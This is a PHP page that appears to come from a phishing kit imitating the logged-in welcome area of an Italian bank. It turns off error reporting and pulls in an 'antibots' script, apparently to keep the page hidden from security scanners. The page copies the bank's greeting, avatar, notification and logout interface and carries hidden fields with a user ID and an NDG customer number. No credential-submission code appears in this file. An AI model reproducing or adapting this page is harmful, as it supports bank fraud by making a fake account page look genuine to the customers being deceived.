<?php
session_start();
error_reporting(0);


include_once "../../antibots.php";

?>
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<title>UserWelcomeBox</title>
		
		
<meta name="build.timestamp" content="2018-01-08T14:45:09Z">
<meta name="build.number" content="2.0.14">
<meta name="node.id" content="01INFO">
		
		
		
<link rel="stylesheet" type="text/css" media="all, print" href="./fonts.css">
<link rel="stylesheet" type="text/css" media="all, print" href="./style(2).css">
<link rel="stylesheet" type="text/css" media="all, print" href="./style-1.css">
<link rel="stylesheet" type="text/css" media="all, print" href="./style(3).css">
<link rel="stylesheet" type="text/css" media="all, print" href="./custom(2).css">

		<link id="cookie-law-css" rel="stylesheet" type="text/css" href="./cookie-law.css" media="all"></head>
	<body class="">
		












<div class="header">
	<div class="bottom dark-gray-bg cf">	
			<div id="logout-menu-container">
				<div class="avatar">
					<img class="avatar_img" src="./avatar_area_privata.png">
				</div>
					
				<div class="right-menu cf">
					<div class="greetings font-small">
						<h2><span>Benvenuto</span></h2>
					</div>
					
					<div class="user-data cf">
						
							<div class="notify-box mail">
								<a href="#" class="png-bg" id="email-icon">Email</a>
								<div class="round"><span>1</span></div>
							</div>
							
						
						<div class="notify-box star">
							<a href="#" title="Bookmarks" class="png-bg" id="star-icon">
								<div class="star-icon"></div>
							</a>
						</div>
						<div class="notify-box logout">
							<a href="#" title="Logout" class="png-bg" id="logout-url">
								<div class="logout-icon"></div>
							</a>
						</div>
					</div>
			</div>
		</div>
	</div>
</div>

<input type="hidden" value="3174249728" name=".user_idPass" id="_user_idPass">
<input type="hidden" value="305817630" name=".user_ndg" id="_user_ndg">


</body></html>